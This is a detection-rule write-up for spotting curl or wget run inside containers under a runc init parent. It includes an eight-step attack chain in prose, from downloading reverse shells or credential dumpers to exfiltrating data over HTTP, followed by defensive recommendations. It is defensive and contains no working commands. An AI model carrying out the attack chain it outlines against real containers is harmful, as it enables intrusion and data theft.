Curl or Wget Execution from Container Context

This detection rule identifies instances of curl or wget being executed from within containerized environments managed by runc init. This is often indicative of malicious activity, such as attackers attempting to download additional tools or exfiltrate data after compromising a container. While curl and wget are commonly used in container images, their execution from within a runc init context warrants closer scrutiny, as it suggests potential container breakout or abuse of privileged workloads. This behavior contrasts with legitimate uses during image builds or initial container setup, requiring defenders to differentiate between benign and malicious usage based on context and command-line arguments.

Attack Chain

1. Initial compromise of a containerized application or service.
2. Attacker gains limited shell access within the compromised container.
3. Attacker attempts to download external tools using curl or wget.
4. The curl or wget process is spawned with runc init as its parent, indicating container context.
5. Downloaded tools may include reverse shells, credential dumping utilities, or data exfiltration scripts.
6. The attacker executes the downloaded tools to escalate privileges or gather sensitive information.
7. Data exfiltration occurs via HTTP/HTTPS using curl or wget to transfer data to an external server.
8. The attacker maintains persistence within the compromised environment for continued access.

Impact

A successful attack could lead to data breaches, unauthorized access to sensitive systems, and potential lateral movement within the network. The number of affected containers and systems would depend on the scope of the initial compromise and the attacker’s objectives. The targeted sectors are broad, as containers are widely used across various industries.

Recommendation

• Deploy the Sigma rule “Detect Curl or Wget Execution from Container Context” to your SIEM to identify suspicious command execution.
• Investigate any alerts generated by the Sigma rule, focusing on the command-line arguments used with curl or wget, and the network connections established by the container.
• Review network policies to restrict egress traffic from containers to only authorized destinations.
• Baseline trusted images and exclude stable image digests or namespaces when noisy, as described in the rule’s false_positives section.
• Ensure syscall coverage includes execve for processes inside containers within Auditd Manager, as mentioned in the setup instructions.